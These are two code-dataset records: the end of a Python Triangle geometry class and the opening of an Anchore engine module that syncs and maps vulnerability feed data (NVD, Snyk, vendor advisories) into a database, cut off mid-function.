s.sort(key=lambda x:x.length)\n return s[-1]\n\n @property\n def alphaRadians(self):\n '''\n The angle described by CAB in radians, float.\n\n 
'''\n return self.AB.radiansBetween(self.AC)\n\n @property\n def alphaDegrees(self):\n return math.degrees(self.alphaRadians)\n\n @property\n def betaRadians(self):\n '''\n The angle described by ABC in radians, float.\n\n '''\n BA = Segment(self.B,self.A)\n return BA.radiansBetween(self.BC)\n\n @property\n def betaDegrees(self):\n return math.degrees(self.betaRadians)\n\n @property\n def gammaRadians(self):\n '''\n The angle described by BCA in radians, float.\n\n '''\n CB = Segment(self.C,self.B)\n return CB.radiansBetween(Segment(self.C,self.A))\n\n @property\n def gammaDegrees(self):\n '''\n '''\n return math.degrees(self.gammaRadians)\n\n @property\n def anglesRadians(self):\n '''\n '''\n return [self.alphaRadians, self.betaRadians, self.gammaRadians]\n\n @property\n def anglesDegrees(self):\n return [self.alphaDegrees, self.betaDegrees, self.gammaDegrees]\n\n @property\n def ab(self):\n '''\n The length of line segment AB, float.\n\n '''\n return self.A.distance(self.B)\n\n @property\n def bc(self):\n '''\n The length of line segment BC, float.\n\n '''\n return self.B.distance(self.C)\n \n @property\n def ac(self):\n '''\n The length of line segment AC, float.\n\n '''\n return self.A.distance(self.C)\n\n @property\n def isCCW(self):\n '''\n Returns True if ABC has a counter-clockwise rotation, boolean.\n\n '''\n return self.A.isCCW(self.B,self.C)\n\n @property\n def ccw(self):\n '''\n Result of ccw(A,B,C), float.\n\n '''\n return self.A.ccw(self.B,self.C)\n \n @property\n def area(self):\n '''\n Area of the triangle, float.\n\n '''\n return abs(self.ccw) / 2\n\n @property\n def semiperimeter(self):\n '''\n semiperimeter = (|AB|+|AC|+|BC|) / 2\n\n '''\n return sum([x.length for x in self.sides])/2.\n\n @property\n def isEquilateral(self):\n '''\n Returns true if all sides are the same length.\n '''\n\n ab,bc,ac = self.ab,self.bc,self.ac\n \n return (ab == bc) and (bc == ac)\n\n @property\n def isIsosceles(self):\n '''\n Returns true if two sides are the same length.\n '''\n ab,bc,ac = self.ab,self.bc,self.ac\n \n if ab == bc:\n return True\n\n if ab == ac:\n return True\n\n return bc == ac\n \n\n @property\n def isScalene(self):\n '''\n Returns true if all sides are unequal in length.\n '''\n\n ab,bc,ac = self.ab,self.bc,self.ac\n\n return (ab!=bc) and (ab!=ac) and (bc!=ac)\n\n @property\n def isRight(self):\n '''\n Returns true if one angle in the triangle is a 90 degree (Pi/2\n rad) angle.\n '''\n half_pi = math.pi / 2\n for a in self.anglesRadians:\n if a == half_pi: # epsilon check?\n return True\n return False\n\n\n @property\n def isObtuse(self):\n '''\n Returns true if one angle in the triangle is greater than 90\n degrees (Pi/2 radians).\n\n '''\n half_pi = math.pi / 2\n\n for a in self.anglesRadians:\n if a > half_pi: # epsilon check?\n return True\n return False\n\n @property\n def isAcute(self):\n '''\n Returns true if all angles are less than 90 degrees ( Pi/2 radians).\n '''\n\n half_pi = math.pi / 2\n for a in self.anglesRadians:\n if a >= half_pi: # epsilon check?\n return False\n return True\n\n\n @property\n def mapping(self):\n '''\n Mapping of vertex names to vertices, dict.\n '''\n return { self.vertexNameA:self.A,\n self.vertexNameB:self.B,\n self.vertexNameC:self.C }\n\n def __str__(self):\n return 'A={A}, B={B}, C={C}'.format(**self.mapping)\n\n def __repr__(self):\n return '{klass}({args})'.format(klass=self.__class__.__name__,\n args=str(self))\n\n def __eq__(self,other):\n '''\n x == y\n \n Iff len(set(x.vertices).difference(set(y.vertices))) == 0\n\n '''\n a 
= set(self.vertices)\n b = set(other.vertices)\n return len(a.difference(b)) == 0\n\n def __contains__(self,point):\n '''\n :param: point - Point subclass\n :return: boolean\n\n Returns True if point is inside the triangle or\n lies on any of its sides.\n '''\n try:\n r = [self.A.ccw(self.B,point),\n self.B.ccw(self.C,point),\n self.C.ccw(self.A,point)]\n except CollinearPoints:\n # point is on the lines AB, BC, or CA and that counts.\n return True\n \n return not (any([x>0 for x in r]) and any([x<0 for x in r]))\n\n def altitude(self,side='AB'):\n '''\n :param: side - optional string\n :return: float\n\n The shortest distance from the specified side to the opposite point.\n\n '''\n s = self.semiperimeter\n\n num = 2 * math.sqrt(s*(s-self.ab)*(s-self.bc)*(s-self.ac))\n\n try:\n div = {'AB':self.ab,'AC':self.ac,'BC':self.bc}[side]\n return num / div\n except KeyError:\n # a bad side name raises KeyError (not IndexError) on the dict lookup\n pass\n\n msg = \"expecting 'AB', 'BC' or 'AC', got '{side}'\"\n \n raise ValueError(msg.format(side=side))\n \n \n def flip(self,side='AB'):\n '''\n :param: side - optional string\n :return: None\n\n The optional side parameter should have one of three values:\n AB, BC, or AC. \n\n Changes the order of the triangle's points, swapping the\n specified points. Doing so will change the results of isCCW\n and ccw.\n\n '''\n \n if side == 'AB':\n tmp = Point(self.A)\n self.A = self.B\n self.B = tmp\n return\n \n if side == 'BC':\n tmp = Point(self.B)\n self.B = self.C\n self.C = tmp\n return\n \n if side == 'AC':\n tmp = Point(self.A)\n self.A = self.C\n self.C = tmp\n return\n \n msg = \"expecting 'AB', 'BC' or 'AC', got '{side}'\"\n \n raise ValueError(msg.format(side=side))\n \n\n def doesIntersect(self,other):\n '''\n :param: other - Triangle subclass\n :return: boolean\n\n Returns True iff:\n Any side in self intersects any side in other.\n \n '''\n\n otherType = type(other)\n if issubclass(otherType,Triangle):\n for s in self.sides:\n for q in other.sides:\n if s.doesIntersect(q):\n return True\n return False\n\n if issubclass(otherType,Line):\n for s in self.sides:\n if s.doesIntersect(other):\n return True\n return False\n\n msg = \"expecting Line or Triangle subclasses, got '{type}'\"\n \n raise TypeError(msg.format(type=otherType))\n \n \n","sub_path":"venv/lib/python3.9/site-packages/Geometry/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":11655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
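The Triangle API in the record above suggests a short usage sketch. This is illustrative only: it assumes the package is importable as Geometry (inferred from the record's sub_path) and that Triangle accepts three Point arguments, which the excerpt does not show.

# Sketch only; import path and constructor signature are assumptions.
from Geometry import Point, Triangle

t = Triangle(Point(0, 0), Point(4, 0), Point(0, 3))  # a 3-4-5 right triangle

print(t.area)            # 6.0, since area = |ccw(A, B, C)| / 2 = 12 / 2
print(t.isScalene)       # True: side lengths 3, 4, and 5 all differ
print(t.altitude('BC'))  # 2.4 = 2 * area / |BC|
print(Point(1, 1) in t)  # True, via the __contains__ ccw sign test
# Note: isRight compares float angles exactly against pi/2, so it can be
# fragile for triangles whose right angle is not exact in floating point.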
+{"seq_id":"480184253","text":"\"\"\"\nFeeds manager system. Handles syncing and storing feed data locally for use by the policy engine.\n\nOverall approach is to handle each feed individually with specific mapping code for the data types of each feed.\nThe reason for this is a more efficient (for query) data schema to support quick policy evaluations that require feed\ndata. Additionally, any new feed will require new code to be able to consume it in the policy eval system anyway, so\nan update to the feed handling code is ok to be required as well.\n\n\"\"\"\nimport json\nimport datetime\nimport re\nimport threading\nimport time\nimport traceback\n\nfrom anchore_engine.db import get_thread_scoped_session as get_session\nfrom anchore_engine.db import GenericFeedDataRecord, FeedMetadata, FeedGroupMetadata\nfrom anchore_engine.db import FixedArtifact, Vulnerability, GemMetadata, NpmMetadata, NvdMetadata, CpeVulnerability\nfrom anchore_engine.services.policy_engine.engine.logs import get_logger\nfrom anchore_engine.clients.feeds.feed_service import get_client as get_feeds_client, InsufficientAccessTierError, InvalidCredentialsError\nfrom anchore_engine.util.langpack import convert_langversionlist_to_semver\n\nlog = get_logger()\n\nfeed_list_cache = threading.local()\n\n\ndef build_group_sync_result():\n return {'group': None, 'status': None, 'total_time_seconds': 0, 'updated_record_count': 0, 'updated_image_count': 0}\n\n\ndef build_feed_sync_results():\n return {'feed': None, 'status': None, 'total_time_seconds': 0, 'groups': []}\n\n\ndef get_feeds_config(full_config):\n \"\"\"\n Returns the feeds-specifc portion of the global config. To centralized this logic.\n :param full_config:\n :return: dict that is the feeds configuration\n \"\"\"\n return full_config.get('feeds',{})\n\n\ndef get_selected_feeds_to_sync(config):\n \"\"\"\n Given a configuration dict, determine which feeds should be synced.\n\n :param config:\n :return: list of strings of feed names to sync, an empty least means no feeds. 
Response of None means selective sync is disabled and sync all feeds.\n \"\"\"\n\n feed_config = get_feeds_config(config)\n if not feed_config:\n return []\n\n if feed_config.get('selective_sync', {}).get('enabled', False):\n return [x[0] for x in [x for x in list(feed_config.get('selective_sync', {}).get('feeds', {}).items()) if x[1]]]\n else:\n return None\n\n\nclass SingleTypeMapperFactory(object):\n def __init__(self, feed_name, mapper_clazz, common_key=None):\n \"\"\"\n Create a single-type mapper factory that returns mappers of type \n\n :param feed_name: name of the feed to configure into the mapper\n :param mapper_clazz: the class to instantiate when requested\n :param common_key: the data key to look for in items if all groups use the same key name for data items \n \"\"\"\n\n self.feed = feed_name\n self.mapper_clazz = mapper_clazz\n self.common_key = common_key\n\n def __getitem__(self, item):\n return self.mapper_clazz(self.feed, item, self.common_key)\n\n def get(self, item):\n return self.__getitem__(item)\n\n\nclass FeedDataMapper(object):\n \"\"\"\n Base interface for mapping feed records into the db\n \"\"\"\n\n def __init__(self, feed_name, group_name, keyname):\n self.feed = feed_name\n self.group = group_name\n self.key_item_name = keyname\n\n def map(self, record_json):\n \"\"\"\n Map a single data feed record from msg to db format\n :param record_json: data record deserialized from json (dict) to map\n :return: a DB entity that can be added to a session/persisted\n \"\"\"\n raise NotImplementedError()\n\n\nclass KeyIDFeedDataMapper(FeedDataMapper):\n \"\"\"\n A mapper for handling the case where each data item is a single key that is the id itself, without a field identifier.\n\n E.g. { 'my_id1': { 'data1': 'value1'} } -> key='my_id1', data={'data1':'value1'}\n\n \"\"\"\n\n def map(self, record_json):\n if len(list(record_json.keys())) == 1:\n key, value = list(record_json.items())[0]\n return self.map_inner(key, value)\n\n def map_inner(self, key, data):\n raise NotImplementedError()\n\n\nclass GenericFeedDataMapper(KeyIDFeedDataMapper):\n \"\"\"\n A generic mapping class to consume feed json and return db objects \n \"\"\"\n\n def map_inner(self, key, data):\n \"\"\"\n Map a single data feed record from msg to db format\n :param record_json: data record deserialized from json (dict) to map\n :return: a DB entity that can be added to a session/persisted\n \"\"\"\n\n db_rec = GenericFeedDataRecord()\n db_rec.feed = self.feed\n db_rec.group = self.group\n db_rec.id = key\n db_rec.data = data\n return db_rec\n\n\nclass GemPackageDataMapper(KeyIDFeedDataMapper):\n \"\"\"\n Maps a Gem package feed record to a db record\n \"\"\"\n\n def map_inner(self, key, data):\n db_rec = GemMetadata()\n db_rec.name = key[:255]\n db_rec.id = int(data.get('id')) if data.get('id') else -1\n db_rec.authors_json = data.get('authors')\n db_rec.versions_json = data.get('versions')\n db_rec.licenses_json = data.get('licenses')\n db_rec.latest = data.get('latest')[:255] if data.get('latest') else None\n return db_rec\n\n\nclass NpmPackageDataMapper(KeyIDFeedDataMapper):\n \"\"\"\n Maps a NPM package record to the db record\n \"\"\"\n\n def map_inner(self, key, data):\n db_rec = NpmMetadata()\n db_rec.name = key[:255]\n db_rec.versions_json = data.get('versions')\n db_rec.latest = data.get('latest')[:255] if data.get('latest') else None\n db_rec.sourcepkg = data.get('sourcepkg')[:255] if data.get('sourcepkg') else None\n db_rec.origins_json = data.get('origins')\n db_rec.lics_json = 
data.get('lics')\n return db_rec\n\n\nclass NvdFeedDataMapper(FeedDataMapper):\n \"\"\"\n Maps an NVD record into an NvdMetadata ORM object\n \"\"\"\n def map(self, record_json):\n db_rec = NvdMetadata()\n db_rec.name = record_json['@id']\n db_rec.namespace_name = self.group\n db_rec.summary = record_json.get('summary', \"\")\n\n rawvc = record_json.get('vulnerable-configuration', {})\n db_rec.vulnerable_configuration = rawvc\n #db_rec.vulnerable_configuration = json.dumps(rawvc)\n\n rawvsw = record_json.get('vulnerable-software-list', {})\n db_rec.vulnerable_software = rawvsw\n #db_rec.vulnerable_software = json.dumps(rawvsw)\n\n rawcvss = record_json.get('cvss', {})\n db_rec.cvss = rawcvss\n #db_rec.cvss = json.dumps(rawcvss)\n\n sev = \"Unknown\"\n try:\n #cvss_json = json.loads(self.cvss)\n score = float(rawcvss['base_metrics']['score'])\n if score <= 3.9:\n sev = \"Low\"\n elif score <= 6.9:\n sev = \"Medium\"\n elif score <= 10.0:\n sev = \"High\"\n else:\n sev = \"Unknown\"\n except:\n sev = \"Unknown\"\n db_rec.severity = sev\n\n db_rec.vulnerable_cpes = []\n\n vswlist = []\n try:\n if isinstance(rawvsw['product'], list):\n vswlist = rawvsw['product']\n else:\n vswlist = [rawvsw['product']]\n except:\n pass\n\n # convert each vulnerable software list CPE into a DB record\n all_cpes = {}\n for vsw in vswlist:\n try:\n\n # tokenize the input CPE\n toks = vsw.split(\":\")\n final_cpe = ['cpe', '-', '-', '-', '-', '-', '-']\n for i in range(1, len(final_cpe)):\n try:\n if toks[i]:\n final_cpe[i] = toks[i]\n else:\n final_cpe[i] = '-'\n except:\n final_cpe[i] = '-'\n\n if ':'.join(final_cpe) not in all_cpes:\n all_cpes[':'.join(final_cpe)] = True\n if final_cpe[1] == '/a':\n newcpe = CpeVulnerability()\n newcpe.feed_name = 'nvd'\n newcpe.cpetype = final_cpe[1]\n newcpe.vendor = final_cpe[2]\n newcpe.name = final_cpe[3]\n newcpe.version = final_cpe[4]\n newcpe.update = final_cpe[5]\n themeta = final_cpe[6]\n if 'ruby' in final_cpe[6]:\n themeta = '~~~ruby~~'\n elif 'node.js' in final_cpe[6] or 'nodejs' in final_cpe[6]:\n themeta = '~~~node.js~~'\n elif 'python' in final_cpe[6]:\n themeta = '~~~python~~'\n newcpe.meta = themeta\n newcpe.link = \"https://nvd.nist.gov/vuln/detail/{}\".format(db_rec.name)\n db_rec.vulnerable_cpes.append(newcpe)\n\n except Exception as err:\n log.warn(\"failed to convert vulnerable-software-list into database CPE record - exception: \" + str(err))\n\n return db_rec\n\nclass SnykFeedDataMapper(FeedDataMapper):\n \"\"\"\n Maps a Snyk record into an Vulnerability ORM object\n \"\"\"\n def map(self, record_json):\n if not record_json:\n return None\n\n # get the fundamental categories/ids\n id = list(record_json.keys()).pop()\n pkgvuln = record_json[id]\n (group_name, nslang) = self.group.split(\":\", 2)\n\n # create a new vulnerability record\n db_rec = Vulnerability()\n\n # primary keys\n db_rec.namespace_name = self.group\n db_rec.id = id\n\n # severity calculation\n db_rec.cvss2_score = pkgvuln.get('cvssScore')\n db_rec.cvss2_vectors = pkgvuln.get('cvssV3')\n db_rec.severity = db_rec.get_cvss_severity()\n\n # other metadata\n db_rec.link = pkgvuln.get('url')\n db_rec.description = \"\"\n db_rec.additional_metadata = pkgvuln\n\n # add fixed_in records\n semver_range = convert_langversionlist_to_semver(pkgvuln.get('vulnerableVersions', []), nslang)\n sem_versions = semver_range.split(' || ')\n for sem_version in sem_versions:\n v_in = FixedArtifact()\n v_in.name = pkgvuln.get(\"package\")\n v_in.version = sem_version\n v_in.version_format = \"semver\" 
#\"semver:{}\".format(nslang)\n v_in.epochless_version = v_in.version\n v_in.vulnerability_id = db_rec.id\n v_in.namespace_name = db_rec.namespace_name\n v_in.fix_metadata = {'fix_exists': pkgvuln.get('upgradeable', False)}\n db_rec.fixed_in.append(v_in)\n\n return db_rec\n\n\nclass VulnerabilityFeedDataMapper(FeedDataMapper):\n \"\"\" \n Maps a Vulnerability record:\n\n Example:\n {\n 'Vulnerability': {\n 'Description': 'Async Http Client (aka AHC or async-http-client) before 1.9.0 skips X.509 certificate verification unless both a keyStore location and a trustStore location are explicitly set, which allows man-in-the-middle attackers to spoof HTTPS servers by presenting an arbitrary certificate during use of a typical AHC configuration, as demonstrated by a configuration that does not send client certificates.',\n 'FixedIn': [\n {\n 'Name': 'async-http-client',\n 'NamespaceName': 'debian:9',\n 'Version': '1.6.5-3',\n 'VersionFormat': 'dpkg',\n 'VendorAdvisory': {\n 'NoAdvisory': False,\n 'AdvisorySummary': [\n {\n 'ID': 'DSA-0000-0',\n 'Link': 'https://security-tracker.debian.org/tracker/DSA-0000-0'\n }\n ]\n }\n }\n ],\n 'Link': 'https://security-tracker.debian.org/tracker/CVE-2013-7397',\n 'Metadata': {\n 'NVD': {\n 'CVSSv2': {\n 'Score': 4.3,\n 'Vectors': u'AV:N/AC:M/Au:N/C:N/I:P'\n }\n }\n },\n 'Name': 'CVE-2013-7397',\n 'NamespaceName': 'debian:9',\n 'Severity': 'Medium'}\n }\n \"\"\"\n defaults = {\n 'Severity': 'Unknown',\n 'Link': None,\n 'Description': None\n }\n\n MAX_STR_LEN = 1024 * 64 - 4\n\n def map(self, record_json):\n if not record_json:\n return None\n\n # Handle a 'Vulnerability' wrapper around the specific record. If not present, assume a direct record\n if len(list(record_json.keys())) == 1 and record_json.get('Vulnerability'):\n vuln = record_json['Vulnerability']\n else:\n vuln = record_json\n\n db_rec = Vulnerability()\n db_rec.id = vuln['Name']\n db_rec.namespace_name = self.group\n db_rec.severity = vuln.get('Severity', 'Unknown')\n db_rec.link = vuln.get('Link')\n description = vuln.get(\"Description\", \"\")\n if description:\n db_rec.description = vuln.get('Description','') if len(vuln.get('Description','')) < self.MAX_STR_LEN else (vuln.get('Description')[:self.MAX_STR_LEN - 8] + '...')\n else:\n db_rec.description = \"\"\n db_rec.fixed_in = []\n #db_rec.vulnerable_in = []\n\n #db_rec.metadata_json = json.dumps(vuln.get('Metadata')) if 'Metadata' in vuln else None\n db_rec.additional_metadata = vuln.get('Metadata', {})\n cvss_data = vuln.get('Metadata', {}).get('NVD', {}).get('CVSSv2')\n if cvss_data:\n db_rec.cvss2_vectors = cvss_data.get('Vectors')\n db_rec.cvss2_score = cvss_data.get('Score')\n\n # Process Fixes\n if 'FixedIn' in vuln:\n for f in vuln['FixedIn']:\n fix = FixedArtifact()\n fix.name = f['Name']\n fix.version = f['Version']\n fix.version_format = f['VersionFormat']\n fix.epochless_version = re.sub(r'^[0-9]*:', '', f['Version'])\n fix.vulnerability_id = db_rec.id\n fix.namespace_name = self.group\n fix.vendor_no_advisory = f.get('VendorAdvisory', {}).get('NoAdvisory', False)\n fix.fix_metadata = {'VendorAdvisorySummary': f['VendorAdvisory']['AdvisorySummary']} if f.get('VendorAdvisory', {}).get('AdvisorySummary', []) else None\n\n db_rec.fixed_in.append(fix)\n\n# if 'VulnerableIn' in vuln:\n# for v in vuln['VulnerableIn']:\n# v_in = VulnerableArtifact()\n# v_in.name = v['Name']\n# v_in.version = v['Version']\n# v_in.version_format = v['VersionFormat']\n# v_in.epochless_version = re.sub(r'^[0-9]*:', '', v['Version'])\n# v_in.vulnerability_id = 
db_rec.id\n# v_in.namespace_name = self.group\n#\n# db_rec.vulnerable_in.append(v_in)\n\n return db_rec\n\n\nclass IFeedSource(object):\n \"\"\"\n Base interface for a feed source\n \"\"\"\n\n def list_feeds(self):\n raise NotImplementedError()\n\n def list_feed_groups(self, feed):\n raise NotImplementedError()\n\n def get_feed_group_data(self, feed, group, since=None):\n \"\"\"\n Get data, optionally newer than a specific date. Returns *all* data, for a paged\n approach use the get_paged_feed_group_data function.\n\n :param feed: str feed name\n :param group: str group name\n :param since: datetime object indicating earliest date to fetch data from\n :return:\n \"\"\"\n raise NotImplementedError()\n\n def get_paged_feed_group_data(self, feed, group, since=None, next_token=None):\n \"\"\"\n Get a max_sized page of data using the continuation token.\n\n :param feed:\n :param group:\n :param since:\n :return:\n \"\"\"\n raise NotImplementedError()\n\n\nclass AnchoreFeedServiceClient(IFeedSource):\n \"\"\"\n Simple passthru to the Feeds client to consistently implement the interface\n \n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initializes a default anchore.io service client, but can be overridden by the backing_client argument and will wrap that instead if provided\n :param backing_client:\n \"\"\"\n self._client = None\n\n @property\n def client(self):\n if not self._client:\n self._client = get_feeds_client()\n return self._client\n\n def list_feed_groups(self, feed):\n resp = self.client.list_feed_groups(feed)\n groups = resp.groups\n return groups\n\n def list_feeds(self):\n feed_listing = self.client.list_feeds()\n return feed_listing.feeds\n\n def get_paged_feed_group_data(self, feed, group, since=None, next_token=None):\n # if type(since) == datetime.datetime:\n # since = since.strftime(SINCE_DATE_FORMAT)\n\n if next_token:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since, next_token=next_token)\n else:\n resp = self.client.get_feed_group_data(feed, group, next_token=next_token)\n else:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since)\n else:\n resp = self.client.get_feed_group_data(feed, group)\n\n if next_token and resp.next_token and next_token == resp.next_token:\n raise Exception('Service returned same next token as requested, cannot proceed safely. Aborting fetch')\n\n log.debug('Got data len: {}, token: {}'.format(len(resp.data), resp.next_token))\n return resp.data, resp.next_token\n\n def get_feed_group_data(self, feed, group, since=None):\n # if type(since) == datetime.datetime:\n # since = since.strftime(SINCE_DATE_FORMAT)\n\n next_token = None\n more_data = True\n data = []\n while more_data:\n log.debug('Fetching data, token = {}'.format(next_token))\n\n if next_token:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since, next_token=next_token)\n else:\n resp = self.client.get_feed_group_data(feed, group, next_token=next_token)\n else:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since)\n else:\n resp = self.client.get_feed_group_data(feed, group)\n\n data += resp.data\n if next_token and resp.next_token and next_token == resp.next_token:\n raise Exception('Service returned same next token as requested, cannot proceed safely. 
Aborting fetch')\n\n next_token = resp.next_token\n more_data = bool(next_token)\n log.debug('Got: {} records, token = {}'.format(len(resp.data), next_token))\n\n return data\n\n\nclass DataFeed(object):\n \"\"\"\n Interface for a data feed. A DataFeed combines a means to connect to the feed, metadata about the feed tracked\n locally, and mapping code for ingesting the feed data itself.\n \n \"\"\"\n\n __source_cls__ = None # A class definition that implements IFeedSource\n __feed_name__ = None\n __should_sync__ = None\n __group_data_mappers__ = None # A dict/map of group names to mapper objects for translating group data into db types\n\n def __init__(self, metadata=None, src=None):\n \"\"\"\n Instantiates any necessary clients and makes the feed ready to use\n :param metadata: an existing metadata record if available for bootstrapping\n :param src: an object to use as the feed source. if not provided then the class's __source_cls__ definition is used\n \"\"\"\n\n self.source = self.__source_cls__() if not src else src\n self.metadata = metadata\n\n def sync(self, group=None, item_processing_fn=None, full_flush=False, flush_helper_fn=None):\n \"\"\"\n Ensure the feed is synchronized. Performs per-item checks and invokes item_processing_fn, if provided.\n Transaction scope is the update for an entire group.\n\n item_processing_fn is expected to be a function that can consume a db session but should *NOT* commit or rollback the session. The caller will handle that to properly maintain\n session scope to each item to be updated.\n\n :param group: the group name to update if only a single group update is required\n :param item_processing_fn: A function with first param the db session and second param the updated item, which is called on each updated item within the update transaction scope\n :param full_flush: Remove any old data from the feed and replace with new sync data\n :param flush_helper_fn: Function to invoke during each group's data flush process\n :return: list of updated records added to the database\n \"\"\"\n raise NotImplementedError()\n\n def bulk_sync(self, group=None):\n \"\"\"\n Similar to sync, but uses bulk operations and is therefore more prone to failure due to things like data conflicts.\n\n This is intended for large initial syncs or operations where conflicts and updates are less likely than a large\n volume of inserts.\n\n :param group: the group name to update if only one is desired. If not provided then all groups are updated\n :return: dict of group:record_count_inserted\n \"\"\"\n raise NotImplementedError()\n\n\nclass AnchoreServiceFeed(DataFeed):\n \"\"\"\n A data feed provided by the Anchore Feeds service.\n\n Metadata persisted in the backing db.\n Instance load will fire a load from the db to get the latest metadata in db, and sync\n operations will sync data and metadata from the upstream service.\n \"\"\"\n\n __source_cls__ = AnchoreFeedServiceClient\n __group_data_mappers__ = GenericFeedDataMapper\n\n MAX_FEED_SYNC_PAGES = 4 # Number of pages of data (~5mb each) to process at a time during feed sync to keep memory usage reasonable\n\n def __init__(self, metadata=None, src=None):\n if not metadata:\n db = get_session()\n metadata = db.query(FeedMetadata).get(self.__feed_name__)\n\n super(AnchoreServiceFeed, self).__init__(metadata=metadata, src=src)\n\n def never_synced(self):\n \"\"\"\n Returns true if this feed has never been successfully synced. 
Essentially checks the last_full_sync timestamp for existence.\n :return: boolean\n \"\"\"\n is_not_synced = not self.metadata or not self.metadata.last_full_sync\n log.debug('Feed {} has never been synced? {}'.format(self.__feed_name__, is_not_synced))\n return is_not_synced\n\n def _sync_meta(self):\n \"\"\"\n Ensure feed metadata is up-to-date in the db\n :return:\n \"\"\"\n\n # Refresh data from the db if available\n session = get_session()\n\n if not self.metadata:\n meta_record = session.query(FeedMetadata).get(self.__feed_name__)\n if meta_record:\n self.metadata = meta_record\n\n my_feed = [x for x in self.source.list_feeds() if x.name == self.__feed_name__]\n if not my_feed:\n raise Exception('No feed with name {} found on feed source'.format(self.__feed_name__))\n else:\n my_feed = my_feed[0]\n\n if not self.metadata:\n self.metadata = FeedMetadata(name=my_feed.name, description=my_feed.description, access_tier=my_feed.access_tier)\n session.add(self.metadata)\n else:\n self.metadata.description = my_feed.description\n self.metadata.access_tier = my_feed.access_tier\n session.add(self.metadata)\n\n def record_count(self, group_name):\n raise NotImplementedError()\n\n def _get_data(self, group_name, since=None):\n \"\"\"\n Returns a generator to iterate thru data returned by the source\n \n :param group_name: \n :param since: \n :return: \n \"\"\"\n\n if since:\n # if type(since) == datetime.datetime:\n # since = since.strftime(SINCE_DATE_FORMAT)\n data = self.source.get_feed_group_data(self.__feed_name__, group_name, since=since)\n else:\n data = self.source.get_feed_group_data(self.__feed_name__, group_name)\n\n return data\n\n def _load_mapper(self, group_obj):\n \"\"\"\n Find and instantiate the right mapper object for the given group.\n\n :param group_obj:\n :return:\n \"\"\"\n if not hasattr(self.__class__.__group_data_mappers__, 'get'):\n mapper = self.__class__.__group_data_mappers__\n else:\n mapper = self.__class__.__group_data_mappers__.get(group_obj.name)\n\n if not mapper:\n raise Exception('No mapper class found for group: {}'.format(group_obj.name))\n\n # If it's a class, instantiate it\n if type(mapper) == type:\n mapper = mapper(self.__feed_name__, group_obj.name, keyname=None)\n\n return mapper\n\n\n # TODO: context manager for syncs to facilitate simple state management.\n # On enter, create record and state = 'running', on exit, set completion state and commit transaction\n # class SyncContext(object):\n # def __init__(self, feed=None, group=None):\n # log.debug('Beginning sync context')\n # self.sync_record = None\n # self.feed = feed\n # self.group = group\n # self.session = None\n #\n # def __enter__(self):\n # db = get_session()\n # try:\n # self.sync_record = SyncHistory(feed=self.feed, group=self.group)\n # db.add(self.sync_record)\n # db.commit()\n # except:\n # db.rollback()\n # raise\n #\n # self.session = get_session()\n #\n # def __exit__(self, exc_type, exc_val, exc_tb):\n # try:\n # self.session.refresh(self.sync_record)\n # if exc_val:\n # self.sync_record.state = 'failed'\n # else:\n # self.sync_record.state = 'complete'\n #\n # self.sync_record.terminated_at = datetime.datetime.utcnow()\n # self.session.add(self.sync_record)\n # self.session.commit()\n # except:\n # log.exception('Exception committing sync state, rolling back')\n # self.session.rollback()\n # raise\n #\n # def _dedup_data(self, new_data_items):\n # return new_data_items\n\n def _dedup_data_key(self, item):\n \"\"\"\n Return the key value to uniquely identify the item\n :param 
item:\n :return:\n \"\"\"\n return item.__hash__()\n\n def _get_deduped_data(self, group_obj, since=None, next_token=None, max_pages=None):\n \"\"\"\n Fetch data and deduplicate items in-line. Still buffers the full result set in memory,\n but only the deduplicated set, so usage stays modest.\n\n Returns mapped objects, not raw json dicts. Objects are mapped using the class's defined mapper.\n\n :param group_obj:\n :return:\n \"\"\"\n mapper = self._load_mapper(group_obj)\n new_data = True\n pages = 0\n new_data_deduped = {} # Dedup by item key\n while (new_data or next_token) and (max_pages is None or pages <= max_pages):\n new_data, next_token = self.source.get_paged_feed_group_data(self.__feed_name__, group_obj.name,\n since=since,\n next_token=next_token)\n pages += 1\n for x in new_data:\n mapped = mapper.map(x)\n if mapped:\n new_data_deduped[self._dedup_data_key(mapped)] = mapped\n\n # Log before clearing new_data so the logged value reflects this page\n log.debug('Page = {}, new_data = {}, next_token = {}, max_pages = {}'.format(pages, bool(new_data), bool(next_token), max_pages))\n new_data = None\n\n data = list(new_data_deduped.values())\n new_data_deduped = None\n return data, next_token\n\n def _bulk_sync_group(self, group_obj):\n \"\"\"\n Performs a bulk sync of a single group.\n\n :param group_obj:\n :return: number of records inserted\n \"\"\"\n\n fetch_time = time.time()\n new_data_deduped, next_token = self._get_deduped_data(group_obj)\n fetch_time = time.time() - fetch_time\n log.info('Group data fetch took {} sec'.format(fetch_time))\n\n log.info('Adding {} records from group {}'.format(len(new_data_deduped), group_obj.name))\n db_time = time.time()\n db = get_session()\n try:\n for i in new_data_deduped:\n db.add(i)\n\n # Data complete, update the timestamp\n group_obj.last_sync = datetime.datetime.utcnow()\n db.add(group_obj)\n db.commit()\n return len(new_data_deduped)\n except Exception as e:\n log.exception('Error syncing group: {}'.format(group_obj))\n db.rollback()\n raise\n finally:\n db_time = time.time() - db_time\n log.info('Sync db time took {} sec'.format(db_time))\n\n def _sync_group(self, group_obj, full_flush=False):\n \"\"\"\n Sync data from a single group and return the data. 
This operation is scoped to a transaction on the db.\n\n :param group_obj:\n :return:\n \"\"\"\n sync_time = time.time()\n total_updated_count = 0\n result = build_group_sync_result()\n result['group'] = group_obj.name\n\n db = get_session()\n if full_flush:\n last_sync = None\n else:\n last_sync = group_obj.last_sync\n\n try:\n next_token = ''\n while next_token is not None:\n if next_token == '':\n next_token = None\n fetch_time = time.time()\n\n new_data_deduped, next_token = self._get_deduped_data(group_obj, since=last_sync, next_token=next_token, max_pages=self.MAX_FEED_SYNC_PAGES)\n fetch_time = time.time() - fetch_time\n log.info('Group data fetch took {} sec'.format(fetch_time))\n log.info('Merging {} records from group {}'.format(len(new_data_deduped), group_obj.name))\n db_time = time.time()\n\n for rec in new_data_deduped:\n merged = db.merge(rec)\n #db.add(merged)\n db.flush()\n log.info('Db merge took {} sec'.format(time.time() - db_time))\n total_updated_count += len(new_data_deduped)\n\n group_obj.last_sync = datetime.datetime.utcnow()\n db.add(group_obj)\n db.commit()\n except Exception as 